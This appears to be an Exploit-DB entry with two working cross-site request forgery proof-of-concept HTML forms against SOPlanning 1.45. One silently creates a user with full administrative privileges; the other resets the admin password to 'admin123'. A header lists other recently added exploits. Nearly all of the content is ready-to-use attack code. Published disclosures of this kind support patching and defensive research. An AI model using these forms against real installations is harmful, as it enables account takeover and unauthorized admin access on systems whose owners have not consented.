
15 changes to exploits/shellcodes HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path Cuckoo Clock v5.0 - Buffer Overflow Anviz CrossChex - Buffer Overflow (Metasploit) SOPlanning 1.45 - 'by' SQL Injection Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting Avaya Aura Communication Manager 5.2 - Remote Code Execution Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User) WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting SOPlanning 1.45 - Cross-Site Request Forgery (Add User) SOPlanning 1.45 - 'users' SQL Injection LabVantage 8.3 - Information Disclosure
69 lines
No EOL
3.8 KiB
Text
69 lines
No EOL
3.8 KiB
Text
# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
|
|
# Date: 2020-02-14
|
|
# Exploit Author: J3rryBl4nks
|
|
# Vendor Homepage: https://www.soplanning.org/en/
|
|
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
|
|
# Version 1.45
|
|
# Tested on Windows 10/Kali Rolling
|
|
|
|
# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
|
|
# user creation and for changing passwords (Specifically the admin password)
|
|
|
|
# POC For aribtrary user creation:
|
|
# CSRF POC:
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
|
|
<input type="hidden" name="xajax" value="submitFormUser" />
|
|
<input type="hidden" name="xajaxr" value="1581700271752" />
|
|
<input type="hidden" name="xajaxargs[]" value="Testing" />
|
|
<input type="hidden" name="xajaxargs[]" value="" />
|
|
<input type="hidden" name="xajaxargs[]" value="1" />
|
|
<input type="hidden" name="xajaxargs[]" value="Testing" />
|
|
<input type="hidden" name="xajaxargs[]" value="test@test.com" />
|
|
<input type="hidden" name="xajaxargs[]" value="Test" />
|
|
<input type="hidden" name="xajaxargs[]" value="test" />
|
|
<input type="hidden" name="xajaxargs[]" value="true" />
|
|
<input type="hidden" name="xajaxargs[]" value="#FFFFFF" />
|
|
<input type="hidden" name="xajaxargs[]" value="false" />
|
|
<input type="hidden" name="xajaxargs[]" value="false" />
|
|
<input type="hidden" name="xajaxargs[]" value="<xjxobj><e><k>0</k><v>users_manage_all</v></e><e><k>1</k><v>projects_manage_all</v></e><e><k>2</k><v>projectgroups_manage_all</v></e><e><k>3</k><v>tasks_modify_all</v></e><e><k>4</k><v>tasks_view_all_projects</v></e><e><k>5</k><v>tasks_view_all_users</v></e><e><k>6</k><v>lieux_all</v></e><e><k>7</k><v>ressources_all</v></e><e><k>8</k><v>audit_restore</v></e><e><k>9</k><v>parameters_all</v></e><e><k>10</k><v>stats_users</v></e><e><k>11</k><v>stats_projects</v></e></xjxobj>" />
|
|
<input type="hidden" name="xajaxargs[]" value="" />
|
|
<input type="hidden" name="xajaxargs[]" value="" />
|
|
<input type="hidden" name="xajaxargs[]" value="" />
|
|
<input type="hidden" name="xajaxargs[]" value="" />
|
|
<input type="hidden" name="xajaxargs[]" value="" />
|
|
<input type="hidden" name="xajaxargs[]" value="true" />
|
|
<input type="hidden" name="xajaxargs[]" value="<xjxobj></xjxobj>" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
# POC for admin password change:
|
|
|
|
# CSRF POC:
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">
|
|
<input type="hidden" name="xajax" value="submitFormProfil" />
|
|
<input type="hidden" name="xajaxr" value="1581702103306" />
|
|
<input type="hidden" name="xajaxargs[]" value="ADM" />
|
|
<input type="hidden" name="xajaxargs[]" value="test@test.com" />
|
|
<input type="hidden" name="xajaxargs[]" value="admin123" />
|
|
<input type="hidden" name="xajaxargs[]" value="fr" />
|
|
<input type="hidden" name="xajaxargs[]" value="false" />
|
|
<input type="hidden" name="xajaxargs[]" value="false" />
|
|
<input type="hidden" name="xajaxargs[]" value="true" />
|
|
<input type="hidden" name="xajaxargs[]" value="true" />
|
|
<input type="hidden" name="xajaxargs[]" value="true" />
|
|
<input type="hidden" name="xajaxargs[]" value="false" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |